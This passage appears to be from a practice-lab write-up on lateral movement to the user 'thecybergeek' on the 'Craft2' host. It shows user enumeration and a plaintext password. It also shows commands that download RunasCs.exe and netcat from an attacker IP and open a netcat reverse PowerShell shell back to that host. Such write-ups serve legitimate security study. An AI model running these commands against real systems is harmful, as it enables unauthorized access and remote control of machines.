thecybergeek
Attempting to make a lateral movement to the already-compromised thecybergeek user after performing a manual enumeration on the CRAFT2 host.
PS C:\tmp> net user thecybergeek
User name thecybergeek
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/5/2022 9:22:54 AM
Password expires Never
Password changeable 4/5/2022 9:22:54 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/4/2025 10:59:01 AM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.Despite the fact that there is a WinRM service running, it cannot be used since the thecybergeek user is not part of the Remote Management Users group.
PS C:\tmp> curl http://192.168.45.158/RunasCs.exe -OutFile .\RunasCs.exe
PS C:\tmp> .\RunasCs.exe "thecybergeek" winniethepooh "cmd /c whoami"
[*] Warning: The logon for user 'thecybergeek' is limited. Use the flag combination --bypass-uac and --logon-type '5' to obtain a more privileged token.
craft2\thecybergeek
PS C:\tmp> .\RunasCs.exe "thecybergeek" winniethepooh "cmd /c whoami" --bypass-uac --logon-type 5
craft2\thecybergeekHowever, I can use RunasCs.exe instead.
PS C:\tmp> curl http://192.168.45.158/nc64.exe -OutFile .\nc64.exeTransferring a Netcat binary.
PS C:\tmp> .\RunasCs.exe "thecybergeek" winniethepooh "cmd /c C:\tmp\nc64.exe 192.168.45.158 6666 -e powershell"
[*] Warning: The logon for user 'thecybergeek' is limited. Use the flag combination --bypass-uac and --logon-type '5' to obtain a more privileged token.Executing Netcat
--bypass-uac --logon-type 5 flags are REMOVED because it limits the user
/Practice/Craft2/5-Privilege_Escalation/attachments/{FABD9793-78E8-49A7-9AE9-F620C2CF86CD}.png)
Lateral Movement made to the thecybergeek user via leveraging RunasCs.exe.